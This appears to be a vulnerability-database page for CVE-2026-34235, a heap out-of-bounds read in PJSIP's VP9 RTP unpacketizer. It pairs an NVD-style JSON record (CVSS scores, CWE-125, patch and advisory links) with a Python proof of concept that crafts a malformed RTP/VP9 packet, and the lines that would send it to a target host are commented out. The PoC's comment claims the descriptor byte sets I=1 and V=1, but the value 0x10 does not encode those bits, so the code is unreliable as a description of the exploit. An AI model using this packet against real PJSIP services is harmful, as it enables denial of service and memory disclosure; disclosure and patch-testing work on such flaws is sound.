CVE-2026-34235

import socket # Conceptual Proof of Concept for CVE-2026-34235 # Demonstrates crafting a malicious VP9 RTP packet to trigger heap out-of-bounds read. def craft_malicious_vp9_packet(): # RTP Header (simplified) rtp_header = bytes.fromhex("80 60 00 01 00 00 00 01 00 00 00 01") # VP9 Payload Descriptor with crafted Scalability Structure (SS) # Triggering the out-of-bounds read requires specific bit manipulation # in the SS header to specify a length exceeding the actual buffer. # Start of Payload Descriptor: I=1, P=0, L=0, F=0, B=0, E=0, V=1 (SS present) payload_descriptor_start = 0x10 # Crafted SS data indicating a larger structure than provided # This attempts to force the parser to read beyond buffer limits crafted_ss_data = bytes([payload_descriptor_start, 0x80, 0xFF, 0xFF]) return rtp_header + crafted_ss_data # Send the packet to a target PJSIP application (conceptual) # target_ip = "192.168.1.10" # target_port = 5004 # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # sock.sendto(craft_malicious_vp9_packet(), (target_ip, target_port)) # print(f"PoC packet sent to {target_ip}:{target_port}") print("PoC generated for CVE-2026-34235: Heap out-of-bounds read in PJSIP VP9 unpacketizer.")

{"cve": {"id": "CVE-2026-34235", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:32.767", "lastModified": "2026-04-03T14:23:41.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PJSIP is a free and open source multimedia communication library written in C. Prior to version 2.17, a heap out-of-bounds read vulnerability exists in PJSIP's VP9 RTP unpacketizer that occurs when parsing crafted VP9 Scalability Structure (SS) data. Insufficient bounds checking on the payload descriptor length may cause reads beyond the allocated RTP payload buffer. This issue has been patched in version 2.17. A workaround for this issue involves disabling VP9 codec if not needed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17", "matchCriteriaId": "3CEC20D0-E450-41AD-BCF9-4E407594F2A7"}]}]}], "references": [{"url": "https://github.com/pjsip/pjproject/commit/f4c7d08211da1fe2ad1504434a0ad99d12aa7536", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pjsip/pjproject/security/advisories/GHSA-pqrm-53pc-wx28", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}